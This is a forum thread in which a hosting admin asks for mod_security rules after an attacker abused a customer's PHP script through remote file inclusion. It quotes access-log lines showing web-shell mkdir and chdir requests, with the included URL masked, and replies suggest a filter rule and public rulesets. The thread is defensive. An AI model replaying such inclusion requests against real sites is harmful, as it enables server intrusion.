Results 1 to 5 of 5
  1. #1
    Join Date
    Jul 2002
    Posts
    309

    Question Mod_security Need help plz !! Hacker still upload file..

    I just have someone uploading file via php on a website,
    i need a way to block that kind of attack via mod security ?

    Anyone can give me a rules i can add in mod security to avoid this ?


    89.146.147.144 - - [17/Jan/2007:12:24:11 -0600] "GET /favicon.ico HTTP/1.1" 404 1002 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    89.146.147.144 - - [17/Jan/2007:12:24:23 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/&newdir=bh HTTP/1.1" 200 154634 "http://www.XXXX.net/XXXX/index.php?x=************.***??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    89.146.147.144 - - [17/Jan/2007:12:24:32 -0600] "GET /XXXX/index.php?x=************.***?&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/ HTTP/1.1" 200 7444 "http://www.XXXX.net/XXXX/index.php?x=************.***??&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/&newdir=bh" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    89.146.147.144 - - [17/Jan/2007:12:24:41 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/&newdir=************.*** HTTP/1.1" 200 8422 "http://www.XXXX.net/XXXX/index.php?x=http://************.***?&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    Last edited by SoftWareRevue; 01-18-2007 at 06:04 PM.

  2. #2
    Join Date
    Sep 2002
    Posts
    333
    A quick and dirty mod_sec rule to stop this upload is found below. I'm sure someone can write a more elegant rule though.

    SecFilter "\?x=http"

  3. #3
    Join Date
    May 2002
    Location
    Kingston, Ontario
    Posts
    1,573
    Fix your script instead of adding a mod_security rule..
    Upload Guardian 2 - Malicious Upload Scanner - Windows and Linux!
    Instantly scan uploaded files
    Get notified when released

  4. #4
    Join Date
    May 2006
    Posts
    1,398
    www.gotroot.com

    get the jitp.conf and rootkits.conf. There is still some things you have to edit out of the jitp.conf, it comes with a syntax error on apache1 so before you restart apache do a configtest, get the error and find it in jitp.conf and comment it out. Some forwarded x header rule, never works on anything. If you get some time id go through and just comment out all the stuff you dont need to. But those are 2 helpful rulesets to run

  5. #5
    Join Date
    Jul 2002
    Posts
    309
    Quote Originally Posted by Ramprage
    Fix your script instead of adding a mod_security rule..
    Customer script !!!
    For sure i'm ask it to fix it !
    but a rule will avoid this in the futur..
    sadly, lot of Ppl dont patch/update their script..

    will give a try..
    thank you.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •